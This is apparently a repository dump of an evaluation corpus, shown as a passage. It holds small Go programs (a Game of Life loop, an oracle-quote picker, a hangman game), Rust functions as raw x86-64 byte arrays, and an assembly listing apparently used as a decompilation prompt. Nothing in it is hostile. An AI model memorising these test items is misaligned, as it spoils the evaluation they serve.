*n = 1 52 | }() 53 | 54 | board := NewField(*w, *h) 55 | board.Seed() 56 | 57 | for i := uint(0); *n == 0 || i < *n; i++ { 58 | board.Step() 59 | 60 | if !*q { 61 | if i != 0 { 62 | fmt.Printf("\033[%dF", board.H - 1) 63 | } 64 | 65 | board.Draw() 66 | time.Sleep(*f) 67 | } 68 | } 69 | 70 | if *q { 71 | board.Draw() 72 | } 73 | } -------------------------------------------------------------------------------- /eval/go_corpus/source/oracle_predict_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | "bufio" 8 | "math/rand" 9 | ) 10 | 11 | var predictions []string = []string{ 12 | "42", 13 | "Look east!", 14 | "You got the gift, but it looks like you're waiting for something.", 15 | "In one hand you'll have your enemies' life and in the other hand you'll have your own.", 16 | "You just have to make up your own damn mind!", 17 | "Everything that has a beginning has an end.", 18 | "What do all men with power want?", 19 | "Change is inevitable.", 20 | "Know thyself!", 21 | "Love of money and nothing else will ruin you.", 22 | "Care for these things fall on me!", 23 | "Make your own nature, not the advice of others, your guide in life.", 24 | "The number 73 marks the hour of your downfall!"} 25 | 26 | func predict(data []string) { 27 | var index int = 0xFEEDBEEF 28 | for _, s := range data { 29 | for _, c := range s { 30 | index += int(c) 31 | } 32 | } 33 | rand.Seed(int64(index)) 34 | index += rand.Int() 35 | index = index % len(predictions) 36 | fmt.Println("Your prediction:") 37 | fmt.Println(predictions[index]) 38 | } 39 | -------------------------------------------------------------------------------- /eval/go_corpus/source/scaffold_main_2021.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "flag" 6 | "fmt" 7 | "log" 8 | "math/rand" 9 | "os" 10 | "strings" 11 | "time" 12 | ) 13 | 14 | var BODYPARTS = []string { 15 | "liver", 16 | "right kidney", 17 | "spleen", 18 | "pancreas", 19 | "rumen", 20 | "esophagus", 21 | "head", 22 | } 23 | 24 | func main() { 25 | os.Args[0] = "scaffold" 26 | path := flag.String("w", "/usr/share/dict/words", "words file") 27 | seed := flag.Int64( "s", time.Now().UnixNano(), "random seed") 28 | flag.Parse() 29 | 30 | rand.Seed(*seed) 31 | read := bufio.NewReader(os.Stdin) 32 | word := []byte(selec(*path)) 33 | ltrs := len(word) 34 | know := []byte(strings.Repeat("_", ltrs)) 35 | pick := make(map[byte]bool) 36 | fail := 0 37 | 38 | for true { 39 | fmt.Print("(" + string(know) + "): ") 40 | s, err := read.ReadString('\n') 41 | if err != nil {break} 42 | 43 | if len(s) < 2 { 44 | continue 45 | } 46 | 47 | c := s[0] 48 | if pick[c] { 49 | fmt.Println("You already tried that.") 50 | continue 51 | } 52 | 53 | count := 0 54 | pick[c] = true 55 | for i := 0; i < len(word); i++ { 56 | if word[i] == c { 57 | know[i] = c 58 | count++ 59 | } 60 | } 61 | 62 | if count == 0 { 63 | fmt.Println("You lost your " + BODYPARTS[fail] + "!") 64 | fail++ 65 | if fail == len(BODYPARTS) { 66 | fmt.Println("It was fatal.") 67 | return 68 | } 69 | } else { 70 | ltrs -= count 71 | if ltrs == 0 { 72 | fmt.Println("Yay.") 73 | return 74 | } 75 | } 76 | } 77 | } -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/baby_rust_step_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 152, 1, 0, 0, 72, 137, 116, 36, 72, 72, 137, 248, 72, 139, 124, 36, 72, 72, 137, 68, 36, 80, 72, 137, 68, 36, 88, 198, 132, 36, 135, 1, 0, 0, 0, 232, 37, 27, 0, 0, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 37, 72, 139, 116, 36, 96, 72, 139, 124, 36, 104, 232, 117, 29, 0, 0, 72, 137, 84, 36, 56, 72, 137, 68, 36, 64, 235, 0, 72, 139, 84, 36, 56, 72, 139, 116, 36, 64, 72, 141, 124, 36, 112, 232, 133, 29, 0, 0, 235, 0, 198, 132, 36, 135, 1, 0, 0, 1, 72, 141, 124, 36, 112, 232, 225, 236, 255, 255, 137, 68, 36, 52, 235, 38, 139, 68, 36, 52, 137, 132, 36, 136, 0, 0, 0, 184, 1, 0, 0, 0, 49, 201, 129, 188, 36, 136, 0, 0, 0, 0, 0, 17, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 26, 72, 139, 124, 36, 80, 72, 141, 53, 243, 151, 3, 0, 49, 192, 137, 194, 232, 57, 30, 0, 0, 233, 15, 2, 0, 0, 139, 132, 36, 136, 0, 0, 0, 137, 132, 36, 140, 0, 0, 0, 72, 141, 188, 36, 140, 0, 0, 0, 232, 217, 244, 255, 255, 72, 137, 84, 36, 32, 72, 137, 68, 36, 40, 235, 0, 72, 139, 68, 36, 32, 72, 139, 76, 36, 40, 72, 137, 76, 36, 16, 72, 137, 68, 36, 24, 198, 132, 36, 135, 1, 0, 0, 0, 72, 139, 132, 36, 128, 0, 0, 0, 72, 137, 132, 36, 112, 1, 0, 0, 15, 16, 68, 36, 112, 15, 41, 132, 36, 96, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 72, 141, 180, 36, 96, 1, 0, 0, 232, 239, 237, 255, 255, 235, 0, 72, 141, 188, 36, 40, 1, 0, 0, 72, 141, 180, 36, 64, 1, 0, 0, 232, 152, 16, 0, 0, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 72, 141, 180, 36, 40, 1, 0, 0, 232, 81, 254, 255, 255, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 232, 34, 244, 255, 255, 72, 137, 20, 36, 72, 137, 68, 36, 8, 235, 40, 72, 139, 4, 36, 72, 139, 76, 36, 8, 72, 139, 84, 36, 24, 72, 139, 116, 36, 16, 72, 137, 180, 36, 240, 0, 0, 0, 72, 137, 148, 36, 248, 0, 0, 0, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 141, 53, 253, 180, 4, 0, 72, 141, 188, 36, 192, 0, 0, 0, 72, 141, 140, 36, 240, 0, 0, 0, 65, 184, 2, 0, 0, 0, 76, 137, 194, 232, 103, 244, 255, 255, 235, 0, 72, 141, 188, 36, 168, 0, 0, 0, 72, 141, 180, 36, 192, 0, 0, 0, 232, 80, 28, 0, 0, 235, 0, 72, 141, 188, 36, 16, 1, 0, 0, 232, 129, 239, 255, 255, 235, 51, 72, 139, 124, 36, 80, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 15, 16, 132, 36, 168, 0, 0, 0, 15, 41, 132, 36, 144, 0, 0, 0, 72, 141, 180, 36, 144, 0, 0, 0, 232, 90, 24, 0, 0, 235, 40, 72, 141, 188, 36, 144, 0, 0, 0, 232, 227, 238, 255, 255, 235, 0, 246, 132, 36, 135, 1, 0, 0, 1, 117, 50, 235, 17, 235, 242, 72, 139, 124, 36, 72, 198, 132, 36, 135, 1, 0, 0, 0, 232, 178, 238, 255, 255, 72, 139, 68, 36, 88, 72, 129, 196, 152, 1, 0, 0, 195, 72, 141, 124, 36, 112, 232, 27, 239, 255, 255, 235, 213] -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/braintrust_new_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 136, 1, 0, 0, 72, 137, 84, 36, 80, 72, 137, 116, 36, 88, 72, 137, 124, 36, 96, 72, 137, 124, 36, 104, 198, 132, 36, 119, 1, 0, 0, 0, 72, 141, 124, 36, 112, 232, 51, 8, 0, 0, 72, 141, 188, 36, 136, 0, 0, 0, 232, 38, 80, 0, 0, 235, 37, 72, 139, 116, 36, 80, 72, 139, 124, 36, 88, 198, 132, 36, 119, 1, 0, 0, 1, 232, 104, 77, 0, 0, 72, 137, 84, 36, 64, 72, 137, 68, 36, 72, 235, 38, 72, 139, 84, 36, 64, 72, 139, 116, 36, 72, 72, 141, 188, 36, 208, 0, 0, 0, 232, 31, 66, 0, 0, 235, 0, 72, 141, 188, 36, 184, 0, 0, 0, 72, 141, 180, 36, 208, 0, 0, 0, 232, 24, 94, 0, 0, 235, 0, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 232, 0, 0, 0, 72, 139, 132, 36, 192, 0, 0, 0, 72, 137, 132, 36, 240, 0, 0, 0, 72, 139, 132, 36, 200, 0, 0, 0, 72, 137, 132, 36, 248, 0, 0, 0, 72, 141, 188, 36, 232, 0, 0, 0, 232, 41, 88, 0, 0, 72, 137, 84, 36, 48, 72, 137, 68, 36, 56, 235, 0, 72, 139, 68, 36, 48, 72, 139, 76, 36, 56, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 139, 148, 36, 8, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 72, 131, 250, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 20, 72, 141, 124, 36, 112, 232, 92, 7, 0, 0, 72, 137, 68, 36, 40, 233, 168, 0, 0, 0, 72, 139, 132, 36, 0, 1, 0, 0, 72, 137, 68, 36, 24, 72, 139, 132, 36, 8, 1, 0, 0, 72, 137, 68, 36, 32, 128, 56, 91, 117, 17, 72, 139, 116, 36, 24, 72, 141, 124, 36, 112, 232, 164, 8, 0, 0, 235, 15, 72, 139, 68, 36, 32, 128, 56, 93, 116, 7, 233, 93, 255, 255, 255, 235, 239, 72, 141, 124, 36, 112, 232, 103, 7, 0, 0, 72, 137, 84, 36, 8, 72, 137, 68, 36, 16, 235, 0, 72, 139, 116, 36, 8, 72, 139, 124, 36, 16, 72, 141, 21, 26, 28, 5, 0, 232, 229, 248, 255, 255, 72, 137, 4, 36, 235, 0, 72, 139, 20, 36, 72, 139, 116, 36, 24, 72, 141, 188, 36, 136, 0, 0, 0, 232, 185, 78, 0, 0, 235, 0, 72, 139, 84, 36, 24, 72, 139, 52, 36, 72, 141, 188, 36, 136, 0, 0, 0, 232, 161, 78, 0, 0, 235, 0, 233, 244, 254, 255, 255, 72, 139, 68, 36, 40, 72, 131, 248, 0, 15, 148, 192, 52, 255, 168, 1, 117, 71, 198, 132, 36, 119, 1, 0, 0, 0, 15, 16, 132, 36, 136, 0, 0, 0, 15, 16, 140, 36, 152, 0, 0, 0, 15, 16, 148, 36, 168, 0, 0, 0, 15, 41, 148, 36, 48, 1, 0, 0, 15, 41, 140, 36, 32, 1, 0, 0, 15, 41, 132, 36, 16, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 35, 6, 0, 0, 235, 72, 72, 141, 61, 143, 225, 3, 0, 72, 141, 21, 139, 27, 5, 0, 72, 141, 5, 236, 185, 255, 255, 190, 30, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 141, 188, 36, 88, 1, 0, 0, 232, 204, 5, 0, 0, 235, 37, 72, 139, 124, 36, 96, 72, 141, 180, 36, 16, 1, 0, 0, 186, 48, 0, 0, 0, 232, 222, 142, 255, 255, 72, 139, 68, 36, 96, 72, 139, 140, 36, 64, 1, 0, 0, 72, 137, 72, 48, 72, 139, 140, 36, 72, 1, 0, 0, 72, 137, 72, 56, 72, 139, 140, 36, 80, 1, 0, 0, 72, 137, 72, 64, 72, 139, 140, 36, 88, 1, 0, 0, 72, 137, 72, 72, 72, 139, 140, 36, 96, 1, 0, 0, 72, 137, 72, 80, 72, 139, 140, 36, 104, 1, 0, 0, 72, 137, 72, 88, 198, 64, 96, 0, 198, 132, 36, 119, 1, 0, 0, 0, 72, 141, 124, 36, 112, 232, 59, 26, 0, 0, 72, 139, 68, 36, 104, 72, 129, 196, 136, 1, 0, 0, 195] -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/endeavour_enco_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 136, 1, 0, 0, 72, 137, 140, 36, 216, 0, 0, 0, 72, 137, 148, 36, 208, 0, 0, 0, 72, 137, 180, 36, 184, 0, 0, 0, 72, 137, 188, 36, 192, 0, 0, 0, 72, 137, 248, 72, 137, 132, 36, 200, 0, 0, 0, 232, 217, 248, 255, 255, 72, 139, 180, 36, 208, 0, 0, 0, 72, 139, 148, 36, 216, 0, 0, 0, 198, 132, 36, 231, 0, 0, 0, 0, 72, 141, 188, 36, 232, 0, 0, 0, 232, 36, 215, 255, 255, 235, 40, 72, 141, 188, 36, 232, 0, 0, 0, 232, 13, 251, 255, 255, 72, 137, 148, 36, 168, 0, 0, 0, 72, 137, 132, 36, 176, 0, 0, 0, 235, 37, 72, 139, 180, 36, 168, 0, 0, 0, 72, 139, 188, 36, 176, 0, 0, 0, 232, 113, 217, 255, 255, 72, 137, 148, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 235, 0, 72, 139, 180, 36, 152, 0, 0, 0, 72, 139, 188, 36, 160, 0, 0, 0, 232, 26, 215, 255, 255, 72, 137, 148, 36, 136, 0, 0, 0, 72, 137, 132, 36, 144, 0, 0, 0, 235, 0, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 140, 36, 144, 0, 0, 0, 72, 137, 140, 36, 0, 1, 0, 0, 72, 137, 132, 36, 8, 1, 0, 0, 72, 141, 188, 36, 0, 1, 0, 0, 232, 235, 214, 255, 255, 137, 132, 36, 132, 0, 0, 0, 235, 0, 139, 132, 36, 132, 0, 0, 0, 137, 132, 36, 16, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 129, 188, 36, 16, 1, 0, 0, 0, 0, 17, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 18, 72, 141, 188, 36, 232, 0, 0, 0, 232, 171, 17, 0, 0, 233, 56, 3, 0, 0, 139, 132, 36, 16, 1, 0, 0, 137, 132, 36, 20, 1, 0, 0, 131, 188, 36, 20, 1, 0, 0, 32, 117, 23, 72, 139, 188, 36, 192, 0, 0, 0, 190, 47, 0, 0, 0, 232, 236, 248, 255, 255, 233, 252, 2, 0, 0, 246, 132, 36, 231, 0, 0, 0, 1, 117, 12, 131, 188, 36, 20, 1, 0, 0, 63, 116, 32, 235, 53, 72, 139, 188, 36, 192, 0, 0, 0, 190, 32, 0, 0, 0, 232, 191, 248, 255, 255, 235, 0, 198, 132, 36, 231, 0, 0, 0, 0, 235, 214, 72, 139, 188, 36, 192, 0, 0, 0, 190, 63, 0, 0, 0, 232, 161, 248, 255, 255, 233, 172, 2, 0, 0, 72, 139, 188, 36, 184, 0, 0, 0, 232, 239, 231, 255, 255, 72, 137, 84, 36, 112, 72, 137, 68, 36, 120, 235, 0, 72, 139, 116, 36, 112, 72, 139, 124, 36, 120, 232, 228, 205, 255, 255, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 0, 72, 139, 68, 36, 96, 72, 139, 76, 36, 104, 72, 137, 140, 36, 40, 1, 0, 0, 72, 137, 132, 36, 48, 1, 0, 0, 72, 141, 132, 36, 20, 1, 0, 0, 72, 137, 132, 36, 56, 1, 0, 0, 72, 139, 180, 36, 56, 1, 0, 0, 72, 141, 188, 36, 40, 1, 0, 0, 232, 41, 200, 255, 255, 72, 137, 84, 36, 80, 72, 137, 68, 36, 88, 235, 0, 72, 139, 68, 36, 80, 72, 139, 76, 36, 88, 72, 137, 140, 36, 24, 1, 0, 0, 72, 137, 132, 36, 32, 1, 0, 0, 72, 131, 188, 36, 24, 1, 0, 0, 0, 117, 23, 72, 139, 188, 36, 192, 0, 0, 0, 190, 63, 0, 0, 0, 232, 230, 247, 255, 255, 233, 236, 1, 0, 0, 72, 139, 132, 36, 32, 1, 0, 0, 72, 137, 132, 36, 64, 1, 0, 0, 72, 141, 188, 36, 72, 1, 0, 0, 232, 36, 224, 255, 255, 235, 0, 198, 132, 36, 231, 0, 0, 0, 1, 72, 131, 188, 36, 64, 1, 0, 0, 0, 119, 28, 72, 141, 188, 36, 72, 1, 0, 0, 232, 2, 231, 255, 255, 72, 137, 84, 36, 64, 72, 137, 68, 36, 72, 233, 191, 0, 0, 0, 72, 139, 132, 36, 64, 1, 0, 0, 72, 131, 224, 1, 72, 131, 248, 1, 117, 20, 72, 141, 188, 36, 72, 1, 0, 0, 190, 46, 0, 0, 0, 232, 175, 228, 255, 255, 235, 95, 72, 141, 188, 36, 72, 1, 0, 0, 190, 45, 0, 0, 0, 232, 155, 228, 255, 255, 235, 40, 235, 0, 72, 139, 132, 36, 64, 1, 0, 0, 72, 137, 193, 72, 131, 233, 1, 72, 137, 76, 36, 56, 72, 131, 248, 1, 15, 146, 192, 168, 1, 117, 6, 235, 2, 235, 221, 235, 32, 72, 141, 61, 99, 152, 3, 0, 72, 141, 21, 228, 194, 4, 0, 72, 141, 5, 213, 158, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 139, 68, 36, 56, 72, 193, 232, 1, 72, 137, 132, 36, 64, 1, 0, 0, 233, 26, 255, 255, 255, 72, 139, 116, 36, 64, 72, 139, 124, 36, 72, 232, 53, 204, 255, 255, 72, 137, 84, 36, 40, 72, 137, 68, 36, 48, 235, 0, 72, 139, 116, 36, 40, 72, 139, 124, 36, 48, 232, 138, 194, 255, 255, 72, 137, 84, 36, 24, 72, 137, 68, 36, 32, 235, 0, 72, 139, 116, 36, 24, 72, 139, 124, 36, 32, 232, 159, 20, 0, 0, 72, 137, 84, 36, 8, 72, 137, 68, 36, 16, 235, 0, 72, 139, 68, 36, 8, 72, 139, 76, 36, 16, 72, 137, 140, 36, 96, 1, 0, 0, 72, 137, 132, 36, 104, 1, 0, 0, 72, 141, 188, 36, 96, 1, 0, 0, 232, 124, 20, 0, 0, 72, 137, 4, 36, 235, 0, 72, 139, 4, 36, 72, 137, 132, 36, 112, 1, 0, 0, 72, 139, 148, 36, 112, 1, 0, 0, 184, 1, 0, 0, 0, 49, 201, 72, 131, 250, 0, 72, 15, 68, 193, 72, 131, 248, 0, 117, 18, 72, 141, 188, 36, 72, 1, 0, 0, 232, 80, 15, 0, 0, 233, 179, 252, 255, 255, 72, 139, 188, 36, 192, 0, 0, 0, 72, 139, 132, 36, 112, 1, 0, 0, 139, 48, 232, 4, 246, 255, 255, 235, 0, 235, 151, 233, 136, 252, 255, 255, 233, 131, 252, 255, 255, 198, 132, 36, 231, 0, 0, 0, 0, 233, 118, 252, 255, 255, 72, 139, 132, 36, 200, 0, 0, 0, 72, 129, 196, 136, 1, 0, 0, 195] -------------------------------------------------------------------------------- /eval/rust_corpus/disasm/parasite_deco_2021.txt: -------------------------------------------------------------------------------- 1 | [72, 129, 236, 248, 6, 0, 0, 72, 137, 148, 36, 248, 0, 0, 0, 72, 137, 180, 36, 0, 1, 0, 0, 72, 137, 188, 36, 8, 1, 0, 0, 72, 137, 188, 36, 16, 1, 0, 0, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 53, 209, 9, 4, 0, 72, 141, 13, 244, 9, 4, 0, 72, 137, 140, 36, 48, 1, 0, 0, 72, 141, 188, 36, 128, 2, 0, 0, 72, 137, 188, 36, 24, 1, 0, 0, 186, 42, 0, 0, 0, 65, 184, 1, 0, 0, 0, 76, 137, 132, 36, 56, 1, 0, 0, 232, 243, 224, 255, 255, 72, 139, 180, 36, 24, 1, 0, 0, 72, 141, 188, 36, 248, 1, 0, 0, 72, 137, 188, 36, 32, 1, 0, 0, 232, 134, 122, 0, 0, 72, 139, 180, 36, 32, 1, 0, 0, 72, 141, 188, 36, 112, 1, 0, 0, 72, 137, 188, 36, 40, 1, 0, 0, 232, 217, 35, 0, 0, 72, 139, 180, 36, 40, 1, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 52, 102, 0, 0, 72, 139, 140, 36, 48, 1, 0, 0, 76, 139, 132, 36, 56, 1, 0, 0, 72, 141, 53, 95, 9, 4, 0, 72, 141, 188, 36, 64, 4, 0, 0, 186, 54, 0, 0, 0, 232, 123, 224, 255, 255, 235, 40, 72, 141, 188, 36, 184, 3, 0, 0, 72, 141, 180, 36, 64, 4, 0, 0, 232, 236, 121, 0, 0, 235, 0, 72, 141, 188, 36, 48, 3, 0, 0, 72, 141, 180, 36, 184, 3, 0, 0, 232, 5, 35, 0, 0, 235, 0, 72, 141, 188, 36, 0, 3, 0, 0, 72, 141, 180, 36, 48, 3, 0, 0, 232, 190, 101, 0, 0, 235, 0, 72, 141, 53, 13, 9, 4, 0, 72, 141, 13, 207, 8, 4, 0, 72, 141, 188, 36, 0, 6, 0, 0, 186, 67, 0, 0, 0, 65, 184, 1, 0, 0, 0, 232, 230, 223, 255, 255, 235, 40, 72, 141, 188, 36, 120, 5, 0, 0, 72, 141, 180, 36, 0, 6, 0, 0, 232, 87, 121, 0, 0, 235, 0, 72, 141, 188, 36, 240, 4, 0, 0, 72, 141, 180, 36, 120, 5, 0, 0, 232, 144, 34, 0, 0, 235, 0, 72, 141, 188, 36, 192, 4, 0, 0, 72, 141, 180, 36, 240, 4, 0, 0, 232, 73, 101, 0, 0, 235, 0, 72, 139, 188, 36, 8, 1, 0, 0, 232, 202, 19, 0, 0, 235, 40, 72, 139, 148, 36, 248, 0, 0, 0, 72, 139, 180, 36, 0, 1, 0, 0, 198, 132, 36, 231, 6, 0, 0, 1, 72, 141, 188, 36, 128, 6, 0, 0, 232, 219, 18, 0, 0, 235, 38, 72, 141, 188, 36, 128, 6, 0, 0, 232, 86, 21, 0, 0, 72, 137, 148, 36, 232, 0, 0, 0, 72, 137, 132, 36, 240, 0, 0, 0, 235, 37, 72, 139, 180, 36, 232, 0, 0, 0, 72, 139, 188, 36, 240, 0, 0, 0, 232, 106, 222, 255, 255, 72, 137, 148, 36, 216, 0, 0, 0, 72, 137, 132, 36, 224, 0, 0, 0, 235, 0, 72, 139, 148, 36, 216, 0, 0, 0, 72, 139, 180, 36, 224, 0, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 251, 119, 0, 0, 235, 0, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 170, 223, 255, 255, 72, 137, 132, 36, 208, 0, 0, 0, 235, 0, 72, 139, 132, 36, 208, 0, 0, 0, 72, 137, 132, 36, 176, 6, 0, 0, 72, 141, 188, 36, 176, 6, 0, 0, 232, 67, 51, 0, 0, 136, 132, 36, 207, 0, 0, 0, 235, 0, 138, 132, 36, 207, 0, 0, 0, 168, 1, 117, 28, 235, 0, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 188, 36, 128, 6, 0, 0, 232, 248, 12, 0, 0, 233, 116, 3, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 22, 223, 255, 255, 72, 137, 132, 36, 192, 0, 0, 0, 235, 0, 72, 139, 180, 36, 192, 0, 0, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 231, 250, 255, 255, 72, 137, 148, 36, 176, 0, 0, 0, 72, 137, 132, 36, 184, 0, 0, 0, 235, 0, 72, 139, 132, 36, 176, 0, 0, 0, 72, 139, 140, 36, 184, 0, 0, 0, 72, 137, 140, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 184, 222, 255, 255, 72, 137, 132, 36, 168, 0, 0, 0, 235, 0, 72, 139, 180, 36, 168, 0, 0, 0, 72, 141, 188, 36, 0, 3, 0, 0, 232, 137, 250, 255, 255, 72, 137, 148, 36, 136, 0, 0, 0, 72, 137, 132, 36, 144, 0, 0, 0, 235, 0, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 140, 36, 144, 0, 0, 0, 72, 137, 76, 36, 112, 72, 137, 68, 36, 120, 72, 141, 188, 36, 152, 6, 0, 0, 232, 96, 222, 255, 255, 72, 137, 132, 36, 128, 0, 0, 0, 235, 0, 72, 139, 180, 36, 128, 0, 0, 0, 72, 141, 188, 36, 192, 4, 0, 0, 232, 49, 250, 255, 255, 72, 137, 84, 36, 96, 72, 137, 68, 36, 104, 235, 0, 72, 139, 68, 36, 120, 72, 139, 76, 36, 112, 72, 139, 148, 36, 160, 0, 0, 0, 72, 139, 180, 36, 152, 0, 0, 0, 72, 137, 180, 36, 184, 6, 0, 0, 72, 137, 148, 36, 192, 6, 0, 0, 72, 137, 140, 36, 200, 6, 0, 0, 72, 137, 132, 36, 208, 6, 0, 0, 72, 131, 188, 36, 184, 6, 0, 0, 1, 117, 11, 72, 131, 188, 36, 200, 6, 0, 0, 1, 116, 23, 72, 141, 188, 36, 152, 6, 0, 0, 232, 216, 221, 255, 255, 72, 137, 68, 36, 88, 233, 137, 1, 0, 0, 72, 139, 132, 36, 192, 6, 0, 0, 72, 139, 140, 36, 208, 6, 0, 0, 72, 137, 76, 36, 72, 185, 76, 2, 0, 0, 72, 247, 225, 72, 137, 68, 36, 80, 15, 144, 192, 168, 1, 117, 27, 72, 139, 68, 36, 72, 185, 28, 0, 0, 0, 72, 247, 225, 72, 137, 68, 36, 64, 15, 144, 192, 168, 1, 117, 61, 235, 32, 72, 141, 61, 243, 5, 4, 0, 72, 141, 21, 252, 93, 5, 0, 72, 141, 5, 229, 124, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 139, 76, 36, 64, 72, 139, 68, 36, 80, 72, 1, 200, 72, 137, 68, 36, 56, 15, 146, 192, 168, 1, 117, 58, 235, 30, 72, 141, 61, 184, 5, 4, 0, 72, 141, 21, 217, 93, 5, 0, 72, 141, 5, 170, 124, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 197, 72, 139, 116, 36, 96, 72, 139, 124, 36, 104, 49, 192, 137, 194, 232, 62, 49, 0, 0, 72, 137, 68, 36, 48, 235, 30, 72, 141, 61, 176, 5, 4, 0, 72, 141, 21, 137, 93, 5, 0, 72, 141, 5, 114, 124, 255, 255, 190, 28, 0, 0, 0, 255, 208, 235, 141, 72, 139, 76, 36, 48, 72, 139, 68, 36, 56, 72, 1, 200, 72, 137, 68, 36, 40, 15, 146, 192, 168, 1, 117, 25, 72, 139, 68, 36, 40, 72, 5, 0, 172, 0, 0, 72, 137, 68, 36, 32, 15, 146, 192, 168, 1, 117, 53, 235, 33, 72, 141, 61, 96, 5, 4, 0, 72, 141, 21, 57, 93, 5, 0, 72, 141, 5, 34, 124, 255, 255, 190, 28, 0, 0, 0, 255, 208, 233, 58, 255, 255, 255, 72, 139, 68, 36, 32, 137, 199, 232, 58, 205, 255, 255, 137, 68, 36, 28, 235, 33, 72, 141, 61, 45, 5, 4, 0, 72, 141, 21, 6, 93, 5, 0, 72, 141, 5, 239, 123, 255, 255, 190, 28, 0, 0, 0, 255, 208, 233, 7, 255, 255, 255, 139, 124, 36, 28, 72, 141, 53, 24, 93, 5, 0, 232, 3, 48, 0, 0, 137, 68, 36, 24, 235, 0, 139, 116, 36, 24, 72, 139, 188, 36, 8, 1, 0, 0, 232, 204, 15, 0, 0, 235, 0, 233, 96, 254, 255, 255, 72, 139, 124, 36, 88, 232, 43, 220, 255, 255, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 28, 213, 255, 255, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 77, 220, 255, 255, 72, 137, 68, 36, 16, 235, 0, 72, 139, 68, 36, 16, 72, 137, 132, 36, 216, 6, 0, 0, 72, 141, 53, 202, 92, 5, 0, 72, 141, 188, 36, 216, 6, 0, 0, 232, 21, 53, 0, 0, 136, 68, 36, 15, 235, 0, 138, 68, 36, 15, 168, 1, 117, 5, 233, 91, 252, 255, 255, 72, 139, 188, 36, 8, 1, 0, 0, 190, 32, 0, 0, 0, 232, 80, 15, 0, 0, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 177, 212, 255, 255, 235, 0, 233, 51, 252, 255, 255, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 188, 36, 192, 4, 0, 0, 232, 58, 12, 0, 0, 235, 18, 72, 141, 188, 36, 0, 3, 0, 0, 232, 25, 12, 0, 0, 235, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 10, 12, 0, 0, 72, 139, 132, 36, 16, 1, 0, 0, 72, 129, 196, 248, 6, 0, 0, 195] -------------------------------------------------------------------------------- /eval/rust_corpus/prompts/baby_rust_step_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | SUB RSP,0x198 5 | MOV qword ptr [RSP + 0x48],RSI 6 | MOV RAX,RDI 7 | MOV RDI,qword ptr [RSP + 0x48] 8 | MOV qword ptr [RSP + 0x50],RAX 9 | MOV qword ptr [RSP + 0x58],RAX 10 | MOV byte ptr [RSP + 0x187],0x0 11 | LAB_0010b816: 12 | CALL ::deref 13 | MOV qword ptr [RSP + 0x60],RDX 14 | MOV qword ptr [RSP + 0x68],RAX 15 | JMP LAB_0010b84c 16 | LAB_0010b84c: 17 | MOV RSI,qword ptr [RSP + 0x60] 18 | MOV RDI,qword ptr [RSP + 0x68] 19 | CALL core::str::::chars 20 | MOV qword ptr [RSP + 0x38],RDX 21 | MOV qword ptr [RSP + 0x40],RAX 22 | JMP LAB_0010b867 23 | LAB_0010b867: 24 | MOV RDX,qword ptr [RSP + 0x38] 25 | MOV RSI,qword ptr [RSP + 0x40] 26 | LEA RDI,[RSP + 0x70] 27 | CALL core::iter::traits::iterator::Iterator::collect 28 | JMP LAB_0010b87d 29 | LAB_0010b87d: 30 | MOV byte ptr [RSP + 0x187],0x1 31 | LAB_0010b885: 32 | LEA RDI,[RSP + 0x70] 33 | CALL alloc::vec::Vec::pop 34 | MOV dword ptr [RSP + 0x34],EAX 35 | JMP LAB_0010b8bb 36 | LAB_0010b8bb: 37 | MOV EAX,dword ptr [RSP + 0x34] 38 | MOV dword ptr [RSP + 0x88],EAX 39 | MOV EAX,0x1 40 | XOR ECX,ECX 41 | CMP dword ptr [RSP + 0x88],0x110000 42 | CMOVZ RAX,RCX 43 | CMP RAX,0x0 44 | JNZ 